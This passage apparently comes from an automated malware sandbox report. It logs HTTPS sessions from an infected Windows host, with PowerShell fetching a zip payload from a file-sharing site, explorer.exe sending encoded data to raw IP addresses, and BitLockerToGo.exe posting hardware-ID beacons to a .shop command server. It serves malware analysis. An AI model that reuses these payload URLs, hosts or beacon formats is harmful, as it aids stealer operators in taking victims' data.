d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-07-27 06:54:33 UTC	814	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dos3k18kspojbsmsbed1peqc72; expires=Wed, 20-Nov-2024 00:41:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EUWoJIybXMJOwqMX40S%2FhbZd1nNSGloRdtPyjxH%2F7whX0LDqWrnrOWumuMdPTuo98V09plXKFpZuVH0GvD7yNwE%2BevXDpdC3RUdcSM9FOudYM8EN7dVGtpKRAHEd%2FV3WugJ%2Bjj%2F1lA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab8032cdd0c9c-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:33 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 06:54:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50724	31.14.70.245	443	1696	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:34 UTC	220	OUT	GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: store4.gofile.io Connection: Keep-Alive
2024-07-27 06:54:34 UTC	577	IN	HTTP/1.1 200 OK Server: nginx/1.27.0 Date: Sat, 27 Jul 2024 06:54:34 GMT Content-Type: application/zip Content-Length: 296998 Connection: close Accept-Ranges: bytes Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range Content-Disposition: attachment; filename*=UTF-8''vm.zip Last-Modified: Sat, 20 Jul 2024 15:35:59 GMT
2024-07-27 06:54:34 UTC	512	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 dd 74 ee 58 cf a1 af e2 8a 9e 01 00 ff 9f 01 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1e 2c e1 d3 60 9c e8 00 00 00 00 5a b9 e0 9f 01 00 b0 01 30 84 0a 17 00 00 00 02 84 0a 17 00 00 00 e2 f0 81 c7 c8 60 d4 c8 e0 38 d3 0d 6b a8 40 7e 43 42 42 78 45 44 b8 8e c4 f4 26 64 49 c2 fa 90 bd c3 8e 2c 04 65 ca 0c c3 44 33 63 e6 cd 00 1b 15 f2 75 2e 36 08 0d 0d 0d 0d 09 fb e8 2c e7 02 e7 51 1d a5 d6 20 04 61 48 5d 3f 41 9f fb e3 78 8c 57 37 d8 63 1c 04 3b ac 66 fe 55 cd 04 c3 1d cc a6 43 93 5a 4b 8b 57 0a ee dd 76 c6 f0 c4 6f 0b a9 0d b8 52 ab f3 f7 de 75 2d 32 fd d6 ea f7 c9 c6 8c af bf 8a 23 db f4 53 5f 0a f2 0a ef 6d 13 d4 b1 3f 0c f6 df 34 16 d5 4b e0 f1 1b 76 cd 49 6c 55 65 c4 f8 b1 01 f5 86 86 ce fc 44 83 fe 80 f7 d7 52 e7 bf 20 Data Ascii: PKtXdata.bin,`Z0`8k@~CBBxED&dI,eD3cu.6,Q aH]?AxW7c;fUCZKWvoRu-2#S_m?4KvIlUeDR
2024-07-27 06:54:34 UTC	4096	IN	Data Raw: 33 95 ce 64 b8 6e 4a 63 20 5a 89 ec 08 66 8d 4f d6 f5 94 60 1f 4a 69 7a 91 77 33 98 ce e1 73 f5 64 f9 52 17 f4 ec 11 ff 0d 2b 1b b7 5c 82 b9 83 4d 06 af b5 93 16 93 73 06 4a da 21 57 0e d0 d4 9e e4 fa f7 cb 46 51 28 9c f3 f6 26 d0 6a 7c aa d9 31 b5 3b ff 7d cb 79 6f d4 dd eb ed e7 31 d7 1e 41 6c 9c 8b fc 7f 85 a4 04 36 5d 41 e6 6e 44 2e 2d 14 7e ad 9c 70 7a 7e e5 31 7f c5 00 67 b5 90 1a ea ea ea ea ea ea ea ea e8 e9 e9 e9 e5 e6 e6 e6 e6 e6 e6 e6 e0 13 44 2f 56 22 5c 4e 1d e3 63 a0 71 d0 96 6e 78 69 bc ae ef 38 6c da c7 37 97 5e e2 c0 d1 91 6c de 28 53 5e fb b0 9c 48 d1 02 aa f8 a5 f3 52 1e c6 a3 90 9d ea bc ea 56 12 20 18 75 cb 1f 54 c6 e9 c3 dc eb 37 3b 32 ca d2 da 51 95 29 35 28 8e 30 e1 f1 c9 21 dc f4 12 04 2f f9 89 ad 07 e3 87 16 7a 85 5d d5 e8 2c 01 Data Ascii: 3dnJc ZfO`Jizw3sdR+\MsJ!WFQ(&j\|1;}yo1Al6]AnD.-~pz~1gD/V"\Ncqnxi8l7^l(S^HRV uT7;2Q)5(0!/z],
2024-07-27 06:54:34 UTC	4096	IN	Data Raw: 33 7a bc 50 22 52 fe a2 f8 c4 39 89 3f 2e b3 06 08 22 29 03 16 ca 97 fa fc ec cb 51 ad b4 e3 59 e8 e8 bd cc 9c a4 44 21 29 8f 90 c0 20 2c b5 46 f5 45 56 76 bd 24 35 12 10 a7 35 d7 08 20 36 69 79 3a 22 a3 79 ff 42 41 6f db 85 d3 ef 9b 60 55 f9 54 8a c2 72 9b 7d 54 31 eb dc dd 48 dc c5 49 8c 2c a0 65 61 e7 62 0d 64 c0 f9 be 99 1a 67 5d ea 32 e5 3d cf 89 03 e0 09 db 8e af d9 26 6e b6 8a ae df 68 1a be 7c 10 e4 5c 57 87 1e 20 02 ed 21 8c 01 fd f5 e3 93 62 56 48 53 d7 19 37 00 9f 42 f1 58 a5 c2 b5 61 3a f9 d7 fb f8 81 4c 18 8a ca 16 4d e5 59 cf 2f e4 0c a5 df 09 13 fc 1b d0 33 b0 a1 12 db fd 3c 03 81 b3 76 41 58 ff 5e 80 17 f4 3c 43 4e 55 da 72 3b 68 6c e6 a0 58 55 c7 6a c2 2b 97 6b 53 bf 9d 7c e8 61 47 e2 ed 07 35 e2 05 c1 5d e7 ae 3b a5 4d fd a7 3f 25 5d 9f Data Ascii: 3zP"R9?.")QYD!) ,FEVv$55 6iy:"yBAo`UTr}T1HI,eabdg]2=&nh\|\W !bVHS7BXa:LMY/3<vAX^<CNUr;hlXUj+kS\|aG5];M?%]
2024-07-27 06:54:34 UTC	4096	IN	Data Raw: 3d cd 6c 50 05 c1 90 f9 06 f1 67 cd c8 d2 23 5d 14 fe ee d9 c2 b5 3e 6e 71 71 cc f5 88 08 47 5b 04 c1 44 5c 8f 0b 5a 1f 96 70 7e fb 05 aa b8 f1 4c 3a 6f 3c e8 a1 d6 f5 91 60 4d 31 3c b9 44 32 47 5d 53 a4 d9 a8 2f a8 28 b5 e3 d2 c1 85 41 89 e0 3b 13 57 8f c5 4c 00 af 1d c0 97 54 25 95 13 2c 2f 72 31 b7 ef f4 4b 14 c3 03 7d ea 68 b1 62 c5 af 3f 21 19 5a d2 25 78 8f 6e 38 4d 89 27 13 3b 77 40 0a b7 47 1e 2c 80 7d 26 63 cb 15 8e 56 7c 85 40 80 57 d6 38 d9 bd 43 c8 72 f6 55 4b bf 28 3d d1 51 9f c2 e4 b3 20 48 f8 19 c7 60 04 c6 3f 2c 0a cf 2f 84 47 3a 0e 81 c7 80 3e 8c 55 4a a5 79 af 21 b1 08 fd 56 55 13 f2 ac 96 e3 5c dd 6b b0 c6 26 c4 12 77 5d 8b 5b 23 2d 97 ac b5 9a a1 e6 63 44 d1 6f 92 dc 97 06 a7 4e b4 97 55 dc be 7a 6a 16 6b c8 45 30 c2 40 7b 66 f3 cf 3a Data Ascii: =lPg#]>nqqG[D\Zp~L:o<`M1<D2G]S/(A;WLT%,/r1K}hb?!Z%xn8M';w@G,}&cV\|@W8CrUK(=Q H`?,/G:>UJy!VU\k&w][#-cDoNUzjkE0@{f:
2024-07-27 06:54:34 UTC	4096	IN	Data Raw: 42 2f 38 dc 0f 26 2c e6 f7 ba 11 2e 00 f4 ca 5b de 37 06 33 99 8c 4f e9 32 9f 90 d8 f5 9b 8f c6 83 53 f0 f0 07 ff dd 71 a4 f2 63 ee ff 47 34 ad 89 c3 31 65 8f b4 fc dc 75 39 15 dc 3b 4a d9 aa 2f 79 ba ae 05 7a a2 c6 e9 a5 36 5c aa eb bf a3 22 42 59 64 a1 f1 c6 a9 43 41 b5 fc e9 75 85 c5 17 0c 95 26 59 3a 58 e6 49 1b 14 81 5f 74 e7 23 30 f6 7e f6 b4 dc f0 4c 8f 9f af ce bb 39 7d b8 0c 38 2c 3c 85 bf 73 89 15 05 d9 c7 ba 9c b0 b6 c7 06 26 f2 55 21 d3 e8 dd 23 fb 58 ab 31 f7 f1 2f 08 0b 84 52 0e 65 c5 d4 d5 cc 85 5c 7e 25 39 2b 97 b0 fd 15 5c a6 a6 29 65 e0 4c 80 4c 7c b6 a0 29 66 e5 a4 b5 7d 8f de f3 1c 55 68 d7 4b b2 1c 15 f8 6b 16 f3 6b 56 5b 29 d5 af 2c 62 11 75 4f 88 28 1d 01 5c 72 b1 4c fa 88 2c 6d 10 31 fe a6 e3 c9 fd f3 8a fd 1e e3 f2 9d 57 07 4c 53 Data Ascii: B/8&,.[73O2SqcG41eu9;J/yz6\"BYdCAu&Y:XI_t#0~L9}8,<s&U!#X1/Re\~%9+\)eLL\|)f}UhKkkV[),buO(\rL,m1WLS
2024-07-27 06:54:34 UTC	4096	IN	Data Raw: 0e 76 6b de 75 6e 21 70 29 8a 7a 31 f3 42 32 b6 49 e1 39 ac f9 c0 3f 5e 6b cf ce a1 c4 13 20 f4 96 f6 90 a8 7d ff 0f 2d e4 fd 74 e3 28 c4 d3 a4 83 f0 30 bd 5e 35 61 bd 64 6c 4a 98 8e 03 e9 e7 05 96 6f b4 12 12 89 9e 7b 1b 40 b5 7e 9b ee 82 1d ea ac cb eb 85 06 c0 2f cc 86 33 8e d7 97 b4 c6 82 20 54 76 54 8c af 89 09 69 bb 91 a2 ee 7c f8 e1 b4 32 0d 4c 5a 4f 74 f8 c3 10 ce 72 b4 cc f9 9d f6 57 9e 05 fe fc 21 9e 9c b7 9d 80 ac 8e 23 84 cc 0f be ac aa 0c bd 22 9a 24 ed 55 b5 b2 b2 7e ab b7 2e ab 93 60 d4 2c 1d 4b 67 0d 6d 0a c8 7e 7b 84 69 80 46 10 a4 e3 28 d1 3c 8b 77 14 8d b8 f4 c1 73 73 b8 b4 c6 77 e8 3d f2 b0 95 48 48 18 24 3c 8c 2f 5c 85 6c 71 e0 1a 52 82 c2 f7 04 c8 16 03 77 bd ea 37 7a 0e e1 1e 83 63 e5 ab e4 1d 2f 56 22 a4 ab 71 eb f7 7f 71 ab f2 79 Data Ascii: vkun!p)z1B2I9?^k }-t(0^5adlJo{@~/3 TvTi\|2LZOtrW!#"$U~.`,Kgm~{iF(<wssw=HH$</\lqRw7zc/V"qqy
2024-07-27 06:54:34 UTC	4096	IN	Data Raw: 61 44 99 ae d9 5f 85 61 f5 9a ae b4 27 63 28 9a e3 83 1c 5c 93 9e d9 a4 e0 ef 8b 92 20 f7 c5 6c b4 66 b5 3f dc b1 f4 f6 c4 46 c0 4d 59 9a 4c 9e 82 0a 05 f6 a8 b8 bb 46 f5 76 6b 3c 91 55 e6 c1 d1 aa 30 5b 35 05 ea b8 78 9d 48 d7 e3 2c 79 14 3e ad fa 94 8c a5 14 d8 23 52 d5 0d ee 34 f9 47 53 f7 63 6c 45 ae 5c 72 45 7b b9 64 83 ed 54 74 62 f3 54 87 71 3a a0 ba 5d 1e 9a 44 84 25 4c 29 11 85 62 28 86 c4 62 4d d5 3c f8 fa 12 75 d4 2c 7b 53 fb 08 b5 05 34 23 b3 36 45 35 e0 e7 67 5c 50 97 3f 4e 81 85 63 a9 22 b9 9c 03 6d 9a 53 9f 5d d7 2f e3 ef 69 7b ac de ac 89 67 c3 68 45 93 32 f9 61 e3 34 0b 87 95 47 00 ef c4 cc d6 ef ff 91 99 d2 25 27 05 96 11 b1 3d b9 88 c9 24 24 33 ed 57 59 5f e1 47 43 dc 39 fe 91 57 63 33 5e 48 e4 11 0a 02 d4 72 f4 ed da f1 25 78 7f d6 4a Data Ascii: aD_a'c(\ lf?FMYLFvk<U0[5xH,y>#R4GSclE\rE{dTtbTq:]D%L)b(bM<u,{S4#6E5g\P?Nc"mS]/i{ghE2a4G%'=$$3WY_GC9Wc3^Hr%xJ
2024-07-27 06:54:34 UTC	4096	IN	Data Raw: c6 9a 08 b4 f1 1f fe 00 fd 46 f6 8d 91 d7 25 3e 0d bb b8 2a 21 34 7f 26 7b d8 57 ea 8b f7 d4 dd 58 da 17 30 a7 07 70 66 05 33 de c5 86 42 1b c6 45 a9 3c dc dc 0b 07 c5 ad 5a a4 4c 86 2d 04 ba 90 3f fb 2c cd 71 25 2a 95 61 01 3b 85 d4 e5 9b 47 da 17 5a 13 71 e8 f5 ea f7 ef 53 e7 36 e6 cf d0 c9 1e 25 b7 79 66 93 a9 64 94 bc df 87 83 c0 4d 92 09 63 4e cc 7c c6 6c d1 78 1f 7c 2a be ad c7 bc 69 39 a7 c3 00 4a aa 0e 27 c1 0e 13 ec 8c bd 32 07 a0 0c b3 0b 16 f0 ff 57 42 e1 26 ec 71 b4 af 88 d3 13 0a 08 9f 0f 17 be d1 71 ef 82 06 8b 4d 52 1a 86 06 d6 b9 1f ae 05 4b 6d ca 31 67 fc 97 75 29 2a 72 bc 54 11 2c a8 ce 94 05 dc 54 a5 09 61 bc 9f e5 d1 7e fb 1a bd d3 eb 17 e9 e5 cc b9 c9 ce af 4f 84 ad da 97 12 2d 81 d4 5a 23 c4 15 9e ec 98 91 c6 16 eb 2d 6a e9 f5 4d 45 Data Ascii: F%>!4&{WX0pf3BE<ZL-?,q%a;GZqS6%yfdMcN\|lx\|i9J'2WB&qqMRKm1gu)rT,Ta~O-Z#-jME
2024-07-27 06:54:34 UTC	4096	IN	Data Raw: 3a b1 f5 56 a3 46 09 66 0f 7c 4c 68 ea 1d 72 9d 06 f0 dd e5 73 ca d9 33 bc 95 e7 29 85 46 2e 9d a1 a4 9c 63 57 56 c6 c6 f4 4e 05 86 44 ea 37 65 30 84 79 0e f7 c8 84 b4 71 bf a2 de b1 b6 10 87 06 07 3c c9 76 a3 0a 7b 4f b7 1c 1c 66 da 89 8a d3 9e 10 3b 35 97 b2 1e 18 99 80 6e 22 b5 7f 7e 41 4a 3b 98 1b ae 71 de 60 d0 9d aa a6 73 c8 99 ce 00 6b 4e e5 c9 cf c7 04 a1 f0 49 64 6f 8b 8b 4f 01 9c c4 f3 ce 4b 1d d5 26 87 81 88 3c bf f2 b6 b3 f7 97 ee b1 1b 4f 8a 74 24 1d 92 1f 39 7d 2e c0 0d 9c 17 b6 d9 71 34 3f e0 78 cf a5 0e 4a 3f 57 9a eb 75 57 48 2c e4 f1 d5 b9 69 f1 41 3c 32 ff 23 ed 60 09 21 98 5e b9 9e ba 67 95 00 9d 25 f9 62 1d 1d 2a 4e ce bb 74 52 27 97 11 39 71 ac df 04 ca 34 71 9e 44 70 1a 53 8e 78 5f 07 6b 28 8b f1 b4 f8 8a 93 e3 13 27 0f 8d f1 c6 a2 Data Ascii: :VFf\|Lhrs3)F.cWVND7e0yq<v{Of;5n"~AJ;q`skNIdoOK&<Ot$9}.q4?xJ?WuWH,iA<2#`!^g%b*NtR'9q4qDpSx_k('
2024-07-27 06:54:34 UTC	4096	IN	Data Raw: 34 02 0a 6c 1e bc a6 59 40 b8 41 3d 0e 24 4e 66 dc 6d 19 d4 b0 73 28 7c b0 e5 f2 82 51 cf 80 02 43 34 45 2a 9a 8c 3c 60 2f d1 7b 7f 0b 5f 2a 3e 10 b3 8a ab 82 8b e6 6a f1 a1 5e 1b b8 8f 71 db 09 d9 be 39 83 6f 1e 51 d4 3c 3f 80 8c 5d 7a 31 6e b3 89 67 c0 30 d7 df c0 f0 1e ed e0 92 d9 a7 09 0f b6 9c 47 81 a8 12 48 60 10 4f 14 0c d3 15 ca 54 23 e5 5d 6e c5 03 e5 10 9a f0 3e b4 02 26 e8 b9 01 a6 65 79 5b 7b 66 b2 5c 70 b9 16 d5 26 f9 e8 5e e9 ea 5f 00 b7 73 25 b9 f9 5b 5e 3e 82 1f 48 f2 6c 61 0b cf e4 cd d2 33 e4 c8 4c 19 05 b7 09 57 69 33 c0 b2 9a 94 93 2b dd 7c 16 b4 60 18 99 a7 c8 d2 de 5c c7 7e 8b 11 30 93 37 15 e0 02 01 c1 b1 78 df f0 1c 5a 35 e4 ab 35 1b 06 54 d1 af 73 88 df e2 29 cb b9 b3 48 0a ab 78 5d 2b 7d 88 a5 e6 28 f3 1d 1d f6 db 5c 10 cd f6 2c Data Ascii: 4lY@A=$Nfms(\|QC4E<`/{_>j^q9oQ<?]z1ng0GH`OT#]n>&ey[{f\p&^_s%[^>Hla3LWi3+\|`\~07xZ55Ts)Hx]+}(\,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50725	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:34 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:34 UTC	1267	OUT	Data Raw: 41 62 70 67 63 59 45 4a 4c 73 4a 77 77 33 79 6f 31 71 49 68 72 72 4b 75 38 71 41 2f 32 36 30 71 68 49 45 38 66 53 69 57 2b 52 42 48 70 45 32 42 66 57 63 64 30 6c 72 78 7a 75 50 6f 64 4a 41 2b 4f 59 75 33 56 63 52 78 74 73 4c 57 2f 7a 59 66 49 78 65 61 4a 41 42 52 2f 67 2f 57 36 2b 31 72 6a 47 71 45 63 64 63 78 48 7a 77 52 4b 54 6c 39 37 34 72 47 69 43 6b 6d 4a 4a 54 77 47 58 57 74 70 4e 44 67 46 71 4c 7a 59 44 72 55 75 44 68 78 6c 4f 69 65 6c 36 72 57 57 64 62 65 58 54 45 75 6c 73 37 4f 72 4e 68 50 2f 4b 46 71 69 61 6f 4a 46 43 4f 31 73 41 6b 44 46 4f 52 48 48 65 4f 72 45 41 30 58 4b 4f 79 32 7a 51 75 70 55 52 36 48 70 6e 73 6d 44 37 4b 35 2b 54 69 59 58 66 2f 6c 44 52 32 67 6e 58 59 79 38 6a 64 77 79 72 36 6c 66 57 37 61 76 71 51 33 34 2f 43 64 74 48 69 Data Ascii: AbpgcYEJLsJww3yo1qIhrrKu8qA/260qhIE8fSiW+RBHpE2BfWcd0lrxzuPodJA+OYu3VcRxtsLW/zYfIxeaJABR/g/W6+1rjGqEcdcxHzwRKTl974rGiCkmJJTwGXWtpNDgFqLzYDrUuDhxlOiel6rWWdbeXTEuls7OrNhP/KFqiaoJFCO1sAkDFORHHeOrEA0XKOy2zQupUR6HpnsmD7K5+TiYXf/lDR2gnXYy8jdwyr6lfW7avqQ34/CdtHi
2024-07-27 06:54:35 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:35 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:35 UTC	685	IN	Data Raw: 71 7a 31 69 50 53 49 48 64 4c 34 31 58 53 38 4e 58 76 59 69 4a 43 76 62 38 59 5a 4b 4a 32 71 48 56 78 7a 57 59 55 67 68 75 56 7a 2b 41 58 6b 2f 6f 52 72 30 67 31 37 43 62 6a 62 78 4d 78 79 6e 61 49 67 4a 49 48 6c 74 2b 6d 66 2f 38 4d 44 58 42 70 45 73 79 68 4d 7a 33 41 2f 30 4b 54 36 47 33 4a 69 7a 61 76 32 6a 6d 7a 5a 6c 34 33 51 49 36 6f 47 37 71 69 37 4d 36 51 4d 37 52 4d 42 78 4c 64 4e 63 69 45 4d 78 7a 57 44 36 66 59 78 4d 73 37 35 47 6e 66 6e 35 4b 61 45 42 4e 46 35 73 58 6d 4c 51 59 50 51 6d 57 70 6c 50 35 4d 42 65 4f 65 73 61 6b 77 44 49 2b 56 49 51 67 43 33 68 76 31 64 68 6b 69 39 4f 31 34 4d 4b 4c 6e 34 4f 39 61 4d 41 7a 4b 6e 35 52 52 44 57 79 5a 36 55 78 56 4e 75 35 74 59 7a 66 6c 67 38 39 2b 71 30 34 44 39 49 64 45 2f 57 38 57 70 61 47 6f 6b Data Ascii: qz1iPSIHdL41XS8NXvYiJCvb8YZKJ2qHVxzWYUghuVz+AXk/oRr0g17CbjbxMxynaIgJIHlt+mf/8MDXBpEsyhMz3A/0KT6G3Jizav2jmzZl43QI6oG7qi7M6QM7RMBxLdNciEMxzWD6fYxMs75Gnfn5KaEBNF5sXmLQYPQmWplP5MBeOesakwDI+VIQgC3hv1dhki9O14MKLn4O9aMAzKn5RRDWyZ6UxVNu5tYzflg89+q04D9IdE/W8WpaGok

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50726	188.114.97.3	443	3588	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:34 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: callosallsaospz.shop
2024-07-27 06:54:34 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 06:54:35 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0j97o22bpkhbohtpckk2f250mf; expires=Wed, 20-Nov-2024 00:41:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=97vzVxnAZUABDudJH8ictfxT2YVWOjP0ZV0hNnrSMrfH1aLZ4JMF627tF3GLjQwVtkIebsqLFolv8RDYbm66cp19Hso0Cpyajq0f7i8%2Bmh5RsahPomumbIfmv%2BWDAGVlV70epcMkGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab80cae076a5e-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:35 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 06:54:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50728	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:36 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:36 UTC	1267	OUT	Data Raw: 6d 51 34 61 46 43 41 38 56 43 54 63 70 54 56 73 6a 37 51 6b 4f 69 74 64 31 64 6a 44 49 6c 4b 41 61 73 71 75 2f 70 51 6d 56 4b 51 78 33 43 77 4c 62 59 53 34 46 4d 32 51 43 31 33 6e 45 56 61 69 55 43 74 47 4e 37 31 73 64 51 51 50 44 34 54 32 30 64 37 6a 43 59 65 47 30 64 36 43 52 30 52 45 56 50 44 64 46 6d 71 6b 55 42 65 6c 48 46 51 44 44 54 37 65 30 2b 72 41 6e 59 31 50 6c 57 56 39 42 33 35 67 45 4e 4c 48 61 72 32 66 55 64 50 50 78 32 59 4d 79 33 2f 70 37 6e 6d 53 30 34 47 4e 69 6a 46 46 50 6f 4b 53 4d 33 53 69 59 6d 34 2b 7a 32 54 43 67 31 33 61 45 31 33 75 58 6b 4b 55 4f 53 66 55 64 66 6e 55 78 47 2f 4d 55 78 47 62 77 69 2b 75 39 48 65 57 6d 4d 6e 6d 36 42 6c 59 53 4f 76 39 44 4b 36 4a 72 7a 42 2f 38 39 64 70 30 76 33 6a 76 52 66 31 4c 2f 43 59 42 67 6c Data Ascii: mQ4aFCA8VCTcpTVsj7QkOitd1djDIlKAasqu/pQmVKQx3CwLbYS4FM2QC13nEVaiUCtGN71sdQQPD4T20d7jCYeG0d6CR0REVPDdFmqkUBelHFQDDT7e0+rAnY1PlWV9B35gENLHar2fUdPPx2YMy3/p7nmS04GNijFFPoKSM3SiYm4+z2TCg13aE13uXkKUOSfUdfnUxG/MUxGbwi+u9HeWmMnm6BlYSOv9DK6JrzB/89dp0v3jvRf1L/CYBgl
2024-07-27 06:54:37 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:37 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:37 UTC	685	IN	Data Raw: 4a 34 70 67 6c 76 48 48 55 52 56 68 2b 6e 58 46 65 44 50 77 77 65 42 36 6b 44 38 67 77 2b 78 53 37 33 66 70 6c 41 77 73 58 62 4f 50 4a 57 76 78 72 68 75 54 33 39 39 66 64 7a 71 6d 32 6a 34 72 59 78 42 61 4e 78 73 67 51 58 53 5a 75 74 4f 50 69 6e 69 68 59 67 6d 44 41 6a 46 32 69 76 37 45 50 38 62 79 6f 77 54 48 46 76 57 73 35 38 78 75 68 31 70 67 61 65 79 50 73 4e 53 49 63 77 35 47 64 73 4c 55 77 63 4c 79 74 41 67 7a 6e 76 61 67 39 6c 45 4b 4f 30 44 30 39 38 62 58 42 39 34 58 4c 6f 51 52 6a 58 6b 4e 38 30 4a 75 72 39 6d 62 54 48 6b 47 6f 33 38 39 4d 30 46 43 44 78 4e 2b 42 55 43 45 42 66 75 6c 45 59 69 4a 4c 4b 75 4c 46 6a 31 4e 4d 41 66 5a 30 4b 41 53 54 4f 37 76 65 41 59 73 2f 79 4d 6f 38 77 4f 54 46 5a 55 39 7a 70 74 71 33 54 49 4a 53 66 52 56 51 53 52 Data Ascii: J4pglvHHURVh+nXFeDPwweB6kD8gw+xS73fplAwsXbOPJWvxrhuT399fdzqm2j4rYxBaNxsgQXSZutOPinihYgmDAjF2iv7EP8byowTHFvWs58xuh1pgaeyPsNSIcw5GdsLUwcLytAgznvag9lEKO0D098bXB94XLoQRjXkN80Jur9mbTHkGo389M0FCDxN+BUCEBfulEYiJLKuLFj1NMAfZ0KASTO7veAYs/yMo8wOTFZU9zptq3TIJSfRVQSR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50727	188.114.97.3	443	3588	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
